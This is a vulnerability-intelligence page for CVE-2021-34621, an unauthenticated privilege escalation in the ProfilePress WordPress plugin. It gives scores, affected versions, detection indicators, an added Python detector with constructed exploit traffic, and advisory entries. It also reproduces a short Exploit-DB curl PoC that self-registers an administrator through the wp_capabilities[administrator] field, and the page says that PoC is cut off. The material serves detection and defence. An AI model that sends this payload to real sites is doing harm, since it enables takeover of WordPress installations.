CVE-2021-34621
Published 2021-07-07
Priority: P1 · Severity: critical · CVSS 3.1 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: exploited in the wild · public exploit · VulnCheck KEV · initial access
EPSS: 68.86% (99.3rd percentile)
A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| profilepress | profilepress | — | — |
| properfraction | profilepress | 3.0.0 – 3.1.3 | 3.1.4 |
Detection & IOCs (extracted from sources)
- Detect unauthenticated POST requests to /wp-admin/admin-ajax.php that carry both the `pp_ajax_signup` action and a `wp_capabilities[administrator]=1` parameter; this is an attempt to self-register as a WordPress administrator through the vulnerable ProfilePress registration handler.
- Monitor for new WordPress user accounts created with the administrator role through the ProfilePress registration flow (`pp_ajax_signup`). Successful exploitation returns a 200 response, after which the attacker can reach /wp-admin/ and receive the "Welcome to your WordPress Dashboard" page. Treat the 200 alone as weak evidence, since admin-ajax.php commonly answers rejected requests with 200 as well; confirm against the users table (new administrator rows) and subsequent authenticated /wp-admin/ activity from the same client.
- The public exploit sends multipart/form-data with a fixed boundary value. A signature keyed on that boundary string together with the `pp_ajax_signup` action and the `wp_capabilities[administrator]` field catches the unmodified PoC, but the boundary is attacker-chosen and trivially changed, so match on the decoded form fields rather than on the boundary.
- Affected versions are 3.0.0 through 3.1.3 of ProfilePress (formerly WP User Avatar). Scope detection rules to sites running these versions to reduce false positives.
- The exploit requires WordPress 4.7 or higher alongside the vulnerable plugin version range.
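The indicators above can be turned into a small detection routine. The following is an added example written for this page; it is not code from ProfilePress, Wordfence, VulnCheck or the Exploit-DB author. It decodes both urlencoded and multipart bodies using the boundary declared in each request's own Content-Type header (so it does not depend on the PoC's boundary string), and flags POSTs to /wp-admin/admin-ajax.php whose action is `pp_ajax_signup` and which carry a `wp_capabilities[...]` field. The request-record layout (`method`, `path`, `content_type`, `body`, `cookie`, `status` keys) and the sample traffic are constructed assumptions, and the page's `wp_capabilities[administrator]` indicator is widened to any role name.

```python
"""Detect ProfilePress admin self-registration (CVE-2021-34621) in request records.

Added example for this page, not code from the plugin, its vendor or the PoC
author. Indicators taken from the page: POST to /wp-admin/admin-ajax.php,
action=pp_ajax_signup, the wp_capabilities[administrator] field and the
reg_username field. The record format, the cookie/status keys and all sample
requests below are constructed for this example.
"""
from __future__ import annotations

import re
from email.parser import BytesParser
from email.policy import HTTP
from urllib.parse import parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"
SIGNUP_ACTION = "pp_ajax_signup"
# The page documents wp_capabilities[administrator]; the pattern is widened
# to any role so that e.g. wp_capabilities[editor]=1 is flagged as well.
CAP_FIELD = re.compile(r"^wp_capabilities\[(?P<role>[^\]]+)\]$")


def parse_form(content_type: str, body: bytes) -> dict[str, list[str]]:
    """Return form fields from a urlencoded or multipart request body.

    Multipart is parsed with the boundary declared in Content-Type, so the
    rule never depends on the PoC's hard-coded boundary string, which an
    attacker can change at will.
    """
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type == "application/x-www-form-urlencoded":
        return parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
    if media_type == "multipart/form-data":
        # Reuse the stdlib MIME parser: prepend the Content-Type header so the
        # parser picks up the boundary from the request itself.
        raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
        msg = BytesParser(policy=HTTP).parsebytes(raw)
        fields: dict[str, list[str]] = {}
        for part in msg.iter_parts():
            name = part.get_param("name", header="content-disposition")
            if name is not None:
                fields.setdefault(name, []).append(part.get_content().strip())
        return fields
    return {}


def classify(req: dict) -> dict | None:
    """Return a finding for one request record, or None when it is benign."""
    path, _, query = req["path"].partition("?")
    if req["method"] != "POST" or path != AJAX_PATH:
        return None
    fields = parse_form(req.get("content_type", ""), req.get("body", b""))
    # admin-ajax.php reads `action` from the POST body or the query string.
    action = fields.get("action", parse_qs(query).get("action", [""]))[0]
    if action != SIGNUP_ACTION:
        return None
    roles = [m["role"] for name, vals in fields.items()
             if (m := CAP_FIELD.match(name)) and vals and vals[0] not in ("", "0")]
    if not roles:
        return None  # ordinary signup through the same endpoint
    return {
        "user": fields.get("reg_username", ["?"])[0],
        "roles": roles,
        # No WordPress login cookie => unauthenticated, the CVE's precondition.
        "unauthenticated": "wordpress_logged_in_" not in req.get("cookie", ""),
        # A 200 alone does not prove success; pair with a new-admin-user audit.
        "status": req.get("status"),
    }


def scan(records: list[dict]) -> list[dict]:
    """Run classify() over a batch of records and keep the findings."""
    return [f for r in records if (f := classify(r)) is not None]


# --- constructed sample traffic (not captured from a real site) -------------
B = "constructedBoundary1234"  # arbitrary; the parser reads it from the header


def _part(name: str, value: str) -> str:
    return f"--{B}\r\nContent-Disposition: form-data; name=\"{name}\"\r\n\r\n{value}\r\n"


EXPLOIT_MULTIPART = (_part("action", "pp_ajax_signup") + _part("reg_username", "attacker")
                     + _part("wp_capabilities[administrator]", "1") + f"--{B}--\r\n").encode()

SAMPLE_RECORDS = [
    {"method": "POST", "path": AJAX_PATH, "status": 200, "cookie": "",
     "content_type": f"multipart/form-data; boundary={B}", "body": EXPLOIT_MULTIPART},
    {"method": "POST", "path": AJAX_PATH, "status": 200, "cookie": "",
     "content_type": "application/x-www-form-urlencoded",
     "body": b"action=pp_ajax_signup&reg_username=attacker2&wp_capabilities%5Beditor%5D=1"},
    {"method": "POST", "path": AJAX_PATH, "status": 200, "cookie": "",
     "content_type": "application/x-www-form-urlencoded",
     "body": b"action=pp_ajax_signup&reg_username=alice"},  # benign signup
    {"method": "GET", "path": AJAX_PATH + "?action=pp_ajax_signup", "status": 200},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

Matching on the decoded fields means a PoC that switches from multipart to urlencoded, or changes the boundary, is still caught; the `unauthenticated` flag separates the CVE's precondition from an administrator legitimately creating accounts while logged in.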
CVSS provenance
- NVD v3.1: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-h9qm-fw5r-9vmm · unreviewed · 2022-05-24 · CRITICAL · CWE-269 Improper Privilege Management
Same description as the CVE entry above.
VulnCheck
properfraction profilepress Improper Privilege Management · 2021 · CVSS 9.8 CRITICAL
Same description as the CVE entry above.
Affected: properfraction profilepress
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-avatar/user-registration-user-profiles-login-membership-profilepress-formerly-wp-user-avatar-300-313-unauthenticated-privilege-escalation-2
Exploit PoC: https://vulncheck.com/xdb/097
No detection rules found.
Exploit-DB
WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated) · exploitdb · 2021-08-31 · CVSS 9.8 CRITICAL
---
# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Date: 23-08-2021
# Exploit Author: Numan Rajkotiya
# Vendor Homepage: https://profilepress.net/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.1.3
#          [2] WordPress 4.7 or higher
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
# CVE : CVE-2021-34621
#!/bin/bash
# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3
# Change the name and password as per your requirement.
# Usage: ./exploit.sh http://target
URL=$1
# Registration is handled by the plugin's pp_ajax_signup AJAX action, which
# accepted the caller-supplied wp_capabilities[administrator] field and applied
# it to the new account. The PoC's other registration fields are cut off here.
curl -X POST "$URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=pp_ajax_signup" \
  -d "reg_username=numan" \
  -d "wp_capabilities[administrator]=1"
Nuclei
WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness · nuclei · CVSS 9.8 CRITICAL
ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.
Template:
id: CVE-2021-34621

info:
  name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness
  author: 0xsapra
  severity: critical
  description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.
  impact: |
    An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress s
  reference:
    - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html
    - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/